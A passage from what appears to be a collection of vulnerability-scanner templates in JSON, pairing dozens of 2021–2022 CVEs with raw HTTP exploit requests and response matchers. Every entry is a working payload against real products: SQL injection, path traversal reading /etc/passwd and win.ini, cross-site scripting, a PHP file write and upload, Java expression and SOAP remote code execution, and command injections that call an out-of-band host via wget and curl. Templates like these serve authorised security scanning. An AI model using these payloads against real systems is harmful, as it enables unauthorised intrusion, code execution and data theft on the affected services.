/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-26294","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<AdminLogin>","<AdminPassword>","<DBHost>"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(header,'text/plain')","regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(header,'text/plain')","contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Elementor Website Builder","Elementor Page Builder"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4')"]},{"type":"regex","part":"body","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd","{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey <1.5.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24215","info":{"name":"Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")"],"condition":"and"}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink 